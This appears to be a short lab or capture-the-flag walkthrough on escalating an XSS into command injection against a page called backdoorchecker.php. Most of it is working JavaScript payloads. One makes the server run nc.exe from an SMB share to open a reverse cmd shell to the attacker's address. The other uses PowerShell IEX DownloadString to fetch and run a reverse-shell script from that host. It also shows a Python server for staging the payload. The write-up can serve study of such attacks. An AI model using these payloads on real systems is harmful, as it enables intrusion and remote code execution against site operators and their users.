I would like to share knowledge on how to leverage your attack once you have found one or two vulnerabilities to step further so that you can maximize the attack
The XSS injection payload will contain two stages where the first stage the code that we inject is to load the second stage the bigger payload.
let see the first stage xss code
Method 1 Command Injection
var xhttp = new XMLHttpRequest(); xhttp.open("POST","backdoorchecker.php", true); xhttp.send("cmd=diras || \\\\10.10.14.7\\smb\\nc.exe -e cmd.exe 10.10.14.7 9090");
I use python module to create simple http server to host the second stage
python -m SimpleHTTPServer 80
The second method will use Nishang Powershell to establish reverseshell. We can modify the java.js script as below
var xhttp = new XMLHttpRequest(); var url='/admin/backdoorchecker.php' var param = 'cmd=dir| powershell -c "IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.7/rev.ps1\')"' xhttp.open("POST",url, true); xhttp.requestHeader('Content-Type','application/x-www-form-urlencoded') xhttp.send(param);
Below is for your reference. This is the backdoorchecker.php page with a vulnerability of command injection but can only be invoked from localhost.